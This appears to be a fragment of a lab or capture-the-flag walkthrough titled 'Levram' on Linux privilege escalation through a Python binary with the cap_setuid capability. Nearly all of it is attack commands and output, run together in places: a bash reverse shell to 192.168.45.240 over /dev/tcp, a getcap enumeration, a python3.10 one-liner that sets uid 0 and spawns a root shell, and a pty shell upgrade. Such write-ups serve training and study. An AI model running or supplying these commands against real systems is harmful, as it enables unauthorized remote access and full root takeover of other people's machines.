Levram
Privilege Escalation via Python Binary with cap_setuid
Last updated
Privilege Escalation via Python Binary with cap_setuid
Last updated
# Executed payload for reverse shell
bash -i >& /dev/tcp/192.168.45.240/9999 0>&1getcap -r / 2>/dev/null
>
/snap/core20/1518/usr/bin/ping cap_net_raw=ep
/snap/core20/1891/usr/bin/ping cap_net_raw=ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/python3.10 cap_setuid=ep
/usr/bin/ping cap_net_raw=ep/usr/bin/python3.10 cap_setuid=eppython3.10 -c 'import os; os.setuid(0); os.system("/bin/sh")'# Upgraded shell
python3 -c 'import pty; pty.spawn("/bin/bash")'